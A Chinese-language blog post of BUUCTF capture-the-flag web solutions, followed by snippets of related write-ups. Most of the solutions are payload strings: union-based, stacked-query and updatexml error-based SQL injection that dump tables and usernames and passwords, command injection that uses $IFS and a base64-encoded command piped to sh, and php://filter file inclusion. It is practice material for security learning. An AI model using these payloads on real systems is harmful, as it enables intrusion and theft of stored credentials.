BUUCTF解題 WEB

最新推荐文章于 2024-09-26 23:17:44 发布
最新推荐文章于 2024-09-26 23:17:44 发布
阅读量191 收藏
点赞数
文章标签: html sql javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62132319/article/details/120400781
版权

目录

SQL-[极客大挑战 2019]EasySQL

SQL-[SUCTF 2019]EasySQL

SQL-[极客大挑战 2019]LoveSQL

SQL-[强网杯 2019]随便注(過濾型)

SQL-[极客大挑战 2019]HardSQL(過濾型)

command-injection-[GXYCTF2019]Ping Ping Ping(過濾型)

 javascript-[极客大挑战 2019]Havefun

LFI-[极客大挑战 2019]Secret File

webshell-[极客大挑战 2019]Knife

SQL-[极客大挑战 2019]EasySQL

帳: '<>1<>'

密: '<>1<>'

結束

SQL-[SUCTF 2019]EasySQL

執行語句: select $post['query']||flag from Flag

解一:

▶️*,1

解二:

▶️1;set sql_mode=PIPES_AS_CONCAT;select 1

set sql_mode=PIPES_AS_CONCAT;的作用是将||的功能从 或运算(or) 改为  字符串拼接

SQL-[极客大挑战 2019]LoveSQL

▶️帳號:admin ' order by 1 #

▶️/check.php?username=admin' order by 4%23&password=1  

字段為3

▶️/check.php?username=1' union select 1,2,3%23&password=1

 

▶️/check.php?username=1' union select 1,database(),version()%23&password=1

▶️/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

▶️/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

▶️/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

SQL-[强网杯 2019]随便注(過濾型)

 有過濾輸入值--preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

使用(select * from `1919810931114514`)16進制配合預處裡執行

▶️1';show tables; #

▶️1';show columns from `1919810931114514`;#

▶️1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

SQL-[极客大挑战 2019]HardSQL(過濾型)

[极客大挑战 2019]HardSQL_Sk1y的博客-CSDN博客

使用updataxml或extractvalue

因為updatexml需要xpath格式的字符串,但是以~(0x7e)開頭的字符串不符合,所以會報錯,同時會將括號內的執行結果以錯誤的形式爆出。這就可以實現報錯注入。

payload: updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

▶️check.php?username=admin'^(updatexml(1,concat(0x7e,

database(),0x7e),1))%23&password=1

▶️check.php?username=admin'or(updatexml(1,concat(0x7e,

(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1

▶️check.php?username=admin'or(updatexml(1,concat(0x7e,

(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=1

▶️check.php?username=admin'^(updatexml(1,concat(0x7e,

(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))%23&password=1

command-injection-[GXYCTF2019]Ping Ping Ping(過濾型)

空格使用:$IFS$1 繞過

解1▶️/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

解2▶️/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

解3▶️/?ip=127.0.0.1;ls|xargs$IFS$1tail$IFS$1-2 (ls|xargs tail -2)

 javascript-[极客大挑战 2019]Havefun

F12檢視原始碼,提示URL帶入cat='dog'參數即可顯示flag

LFI-[极客大挑战 2019]Secret File

文件包含教學:

https://read01.com/nEknzdJ.html#.YVBFW5pByUk

burp抓包發現secr3t.php

▶️/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

 

 ▶️base64解密

webshell-[极客大挑战 2019]Knife

[BUUCTF012][极客大挑战 2019]Knife 1_m0_52674595的博客-CSDN博客

XiWei_Pan
关注
BUUCTF WEB filejava
qq_41696858的博客
09-30 1264
简单总结一下,上传的xlsx文件在解析时会调动到[Content_Types].xml的恶意代码,从而去vps上执行含有恶意xxe的file.dtd文件,而这个文件的执行结果就是把受害机。由于扫出来是tomcat,做过java web业务的都知道最重要的一个配置文件是WEB-INF里面的web.xml文件,说他是万物之祖也不为过。先说一下,kali尽量不要更新到python 3.10,否则好多工具都不能用了。这题提示是java题目,上来先是一个上传窗口,尝试文件上传直接写马,发现不行。
BUUCTF——Web
2201_75331136的博客
07-11 1089
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF web】通关 2.0
人若无名,便可专心练剑
03-01 1219
我们把木马后缀进行了修改,发现题目对ph进行了过滤,我开始尝试了利用.htaccess木马文件进行绕过,发现.htaccess确实是可以绕过,但是发现那个木马文件不能呗执行成php木马执行,让getshell。但是我无论怎么输入,他都报这个错误,并且没有回显别的内容说 只有Cuit的学生才能购买Flag,我们猜测,用户和cookie是相关联的,那么我们对用户的cookie进行查看。发现我们上传的.htaccess木马被暴露了,经过尝试,发现是Content-Type: 的原因,我们直接把。
buuctfweb第一题
最新发布
2402_87039650的博客
09-26 139
看到登录页面,一般会想到万能密码或弱口令来爆破,先试弱密码。发现报错了密码部分,根据错误知是单引号闭合。用户名admin 密码admin。buuctfweb第一题。显示用户名错误,加单引号。
BUUCTF N1BOOK】[第一章 web入门] 通关
人若无名,便可专心练剑
02-05 2130
N1BOOK是Nu1L Team为方便读者打造的免费平台,读者可在上面享受书籍相关资源以及查阅勘误。
BUUCTF WEB EASYJAVA
qq_41696858的博客
12-06 325
回来啦,满血复活啦 遇事不决,先审源码,一个明晃晃的a标签看不起谁呢,直接点进去 java.io.FileNotFoundException:{help.docx} 忙猜文件读取漏洞,结合题目中的easyjava,猜都不用猜 javaweb里面的WEB-INF,干就完事了 WEB-INF/web.xml,哦对了,包的形式要手动改成post,为什么呢,因为上传下载这类的请求一般都是post 那么就拿到我们想要的东西了,/Flag由com.wm.ctf.FlagController进行处理 直接访问/Flag,
[红明谷CTF 2021]JavaWeb
feng的博客
10-30 1734
前言 在复现强网拟态的那题Java,原来是今年红明谷的原题,所以到buuctf上复现了一下,熟悉一下攻击的流程,之后学习具体的技术细节。 WP 首先进入页面一看到那个500页面就知道是Spring或者SpringBoot了(还是不太了解,之后再去好好学学)。访问/login会提示/json,再访问/json又会302返回/login,很明显是需要登录得了,传点东西: username=1&password=1 提示登录失败,但是cookie里带了rememberMe=deleteMe;,是个shi
2024年网络安全最新Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结
2401_84264096的博客
05-03 1192
例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。原理:当闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合符。时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。可知此页面与数据库产生交互。
Buuctf-Web-[极客大挑战 2024]EasySQL 1 题解及思路总结(1)
2401_84281594的博客
04-28 820
(但是在本题中有两个变量,这个方法不太适用)
BUUCTF__web题解合集(十一)
风过江南乱的博客
10-04 1371
1、[GKCTF2020]EZ三剑客-EzWeb 2、[BJDCTF 2nd]elementmaster 3、[MRCTF2020]套娃 4、[FBCTF2019]RCEService 5、[WUSTCTF2020]颜值成绩查询
BUUCTF-Web:[极客大挑战 2019]Upload
m0_56161093的博客
05-29 952
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTFWeb题解
xuanyulevel6的博客
08-08 5579
BUUCTFWeb题解
BUUCTF--Web(1~10)
m0_59022585的博客
07-11 222
echo$IFS$9Y2F0IGZsYWcucGhwCg$IFS$9|base64$IFS$9-d$IFS$9|sh执行成功,同时查看源代码取出flag。使用php://input伪协议发现该伪协议被禁用,使用php://filter伪协议拿到base64源代码,使用basecrack进行解码得到源代码,flag就在其中。方法二:base64加密法(使用base64将cat flag.php加密绕过禁用)注意:这里不能只加密flag.php,因为echo写入是不会将$IFS$9转换成空格。
BUUCTF——Web_buuctfweb,精心整理
2401_84160272的博客
04-09 1063
登录后便可查看到flagflag为:启动靶机,出现以下页面查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了源码中 给出了 两个文件,还有一个 **hint.php,**这里给出了flag的位置得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.php,flag应该就在这个php文件中文件名为flag.php,那么flag应该就存在于此文件中,但是我们f12并没有查看到
Buuctf Web题解
2401_84968557的博客
05-16 423
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[红明谷CTF 2021]JavaWeb buu刷题记录
weixin_51458899的博客
04-08 1902
映入眼帘的报错,然后搜一下知道是spring的洞 有个登录,然后提示json,又看到cookie cve-2020-11989 Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) - 腾讯安全玄武实验室 (tencent.com) Apache Shiro权限绕过漏洞分析(CVE-2020-11989) (qq.com) 参考这两篇,得出两种攻击方式 payload1: 双编码绕过 / -> %2f ->%25%32%66 payload2: 分号 使用payl
BUUCTF Web [极客大挑战 2019]Secret File
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [极客大挑战 2019]Secret File一、题目简介二、思路分析1)信息泄露2)文件包含三、解题步骤1)查看网页源代码2)拦截请求,查看响应信息3)文件包含漏洞4)PHP伪协议读取文件内容四、总结 一、题目简介 进入链接以后是一个「文字」页面,没有什么特别的功能 二、思路.
BUUCTF解题web十一道
qq_45837896的博客
05-26 1373
[2019极客大挑战]EASYSQL 到页面里发现是一个登录框 回想注入思路,先判断注入类型,然后尝试登陆绕过 使用万能密码username=’ or 1=1 or ‘1’=‘1’# &password=asd [2019极客大挑战]HAVEFUN 打开页面发现是一只猫猫,点了两下拖了两下发现没什么 然后老规矩F12查看有没有提示信息 发现有这么一段代码,可以对页面传参cat,传cat='dog’就执行了一段代码,不知道是什么,尝试了一下直接出了flag… [SUCTF]EASYSQL 进入发现是
Buuctf-Web-[极客大挑战 2019]EasySQL 1 题解及思路总结
热门推荐
m0_62239233的博客
09-16 1万+
SQL注入。
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值